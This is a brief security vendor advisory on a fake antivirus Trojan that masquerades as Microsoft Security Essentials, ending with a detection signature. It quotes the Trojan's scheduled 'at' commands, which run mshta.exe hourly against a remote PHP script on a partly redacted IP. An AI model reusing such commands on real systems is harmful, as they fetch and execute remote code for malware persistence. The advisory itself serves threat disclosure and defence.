
SonicWALL UTM Research team received reports of a new fake antivirus Trojan in the wild. This Trojan attemps to access a php script on a compromised webserver on the internet for further instructions.
During our research we found that the Trojan will masquerade as the legitimate antivirus product "Microsoft Security Essentials", complete with fake pop-up alerts and detailed scan results.
The screenshots seen above are a result of attempting to run specific legitimate programs such as Internet Explorer and RegEdit that are chosen by this fake antivirus to be a potential threat to the system.
The Trojan performs the following activities upon execution:
at 00:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030at 01:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030at 02:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030...
SonicWALL Gateway AntiVirus provided protection against this threat via the following signature:
GAV: FakeAv.IOX (Trojan)
Share This Article

An Article By
An Article By
Security News
Security News